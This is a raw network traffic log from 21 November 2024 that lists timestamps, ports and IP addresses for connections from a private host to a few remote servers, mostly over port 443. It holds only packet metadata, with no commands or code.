Nov 21, 2024 22:13:13.814162970 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.814194918 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.814201117 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.814218998 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.814224005 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.814249039 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.814260006 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.814270020 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.817651987 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.817687988 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.817771912 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.817771912 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.817783117 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.825812101 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.825861931 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.825876951 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.825887918 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.825906038 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.825922012 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.829229116 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.829289913 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.829297066 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.837598085 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.837636948 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.837691069 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.837697983 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.837734938 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.841165066 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.841233015 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.841242075 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.848820925 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.848870039 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.848912954 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.848922014 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.848973036 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.853434086 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.853521109 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.853535891 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.855036974 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.885535955 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.885581017 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.885651112 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.885665894 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.885821104 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.885821104 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.888459921 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.888530970 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:13.888540030 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:13.899127007 CET	50041	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.899161100 CET	443	50041	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.903064966 CET	50041	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.903326035 CET	50041	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:13.903337002 CET	443	50041	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:13.989851952 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408130884 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408147097 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408169985 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408200979 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408201933 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408230066 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408245087 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408252001 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408261061 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408276081 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408277988 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408293009 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408294916 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408318996 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408333063 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408560038 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408580065 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408615112 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408622980 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408638954 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408853054 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408909082 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.408917904 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.408955097 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.409183979 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409203053 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409236908 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.409244061 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409265995 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.409281969 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.409368038 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409423113 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.409430027 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409707069 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409725904 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409759045 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.409765005 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409778118 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409810066 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.409816980 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.409827948 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410206079 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410259008 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410265923 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410309076 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410446882 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410476923 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410511017 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410516977 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410542965 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410557985 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410562992 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410815954 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410839081 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410866976 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410872936 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.410876036 CET	80	50033	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:14.410902023 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.410948992 CET	50033	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:14.412513971 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.412555933 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.412604094 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.412614107 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.412642002 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.419691086 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.419733047 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.419778109 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.419786930 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.419822931 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.427973032 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.428023100 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.428076982 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.428085089 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.428107977 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.436084986 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.436141014 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.436155081 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.436175108 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.436207056 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.443831921 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.443897009 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.443903923 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.443923950 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.443958044 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.451931000 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.452012062 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.452020884 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.452040911 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.452070951 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.464943886 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.464996099 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.465029001 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.465040922 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.465073109 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.472007036 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.472035885 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.472081900 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.472090006 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.472122908 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.533529043 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.533560991 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.533613920 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.533623934 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.533663034 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.541714907 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.541764975 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.541800976 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.541804075 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.541816950 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.541856050 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.546314955 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.546361923 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.546406031 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.546417952 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.546432972 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.554573059 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.554625988 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.554670095 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.554677963 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.554712057 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.562273979 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.562310934 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.562361002 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.562371969 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.562402010 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.570415020 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.570447922 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.570496082 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.570517063 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.570553064 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.578593016 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.578655958 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.578675985 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.578684092 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.578733921 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.578771114 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.579032898 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.585825920 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.585880041 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.585917950 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.585925102 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.585963011 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.585982084 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.585988045 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.600491047 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.600569963 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.600584030 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.600594997 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.600698948 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.600707054 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.600900888 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.608695030 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.608752012 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.608799934 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.608813047 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.608844042 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.608869076 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.608875036 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.615782022 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.615842104 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.615849018 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.615895033 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.615925074 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.624062061 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.624118090 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.624144077 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.624152899 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.624193907 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.632150888 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.632230043 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.632237911 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.632267952 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.632327080 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.632333994 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.639877081 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.639919996 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.639959097 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.639969110 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.639997005 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.648047924 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.648106098 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.648137093 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.648144007 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.648173094 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.656173944 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.656218052 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.656255960 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.656264067 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.656290054 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.693469048 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:14.693933010 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:14.694001913 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:14.780806065 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.780824900 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791625023 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791646004 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791667938 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791687965 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791692019 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.791697979 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791721106 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791728973 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791780949 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.791800022 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.791807890 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.791907072 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.791976929 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.792026043 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.794778109 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.794786930 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.794811964 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.794842958 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.794861078 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.794886112 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.794902086 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.797363043 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.797380924 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.797456026 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.797472954 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.797497034 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.797518015 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.799875021 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.799895048 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.799936056 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.799942970 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.799973011 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.799982071 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.803241968 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.803261995 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.803328991 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.803335905 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.803378105 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.806051016 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.806066036 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.806128979 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.806137085 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.806173086 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.808573961 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.808600903 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.808639050 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.808645964 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.808677912 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.808690071 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.847491026 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.847517014 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.847569942 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.847583055 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.847625017 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.983562946 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.983616114 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.983640909 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.983656883 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.983685017 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.983695984 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.983702898 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.986735106 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.986757994 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.986834049 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.986845016 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.989356995 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.989408970 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.989418983 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.989444971 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.989474058 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.992656946 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.992706060 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.992726088 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.992733955 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.992784977 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.992814064 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.992880106 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.995223999 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.995242119 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.995289087 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.995301962 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.995330095 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.995347023 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.997956038 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.997997999 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.998024940 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.998033047 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:14.998060942 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.998076916 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:14.998083115 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.000569105 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.000607967 CET	443	50013	23.44.203.17	192.168.2.5
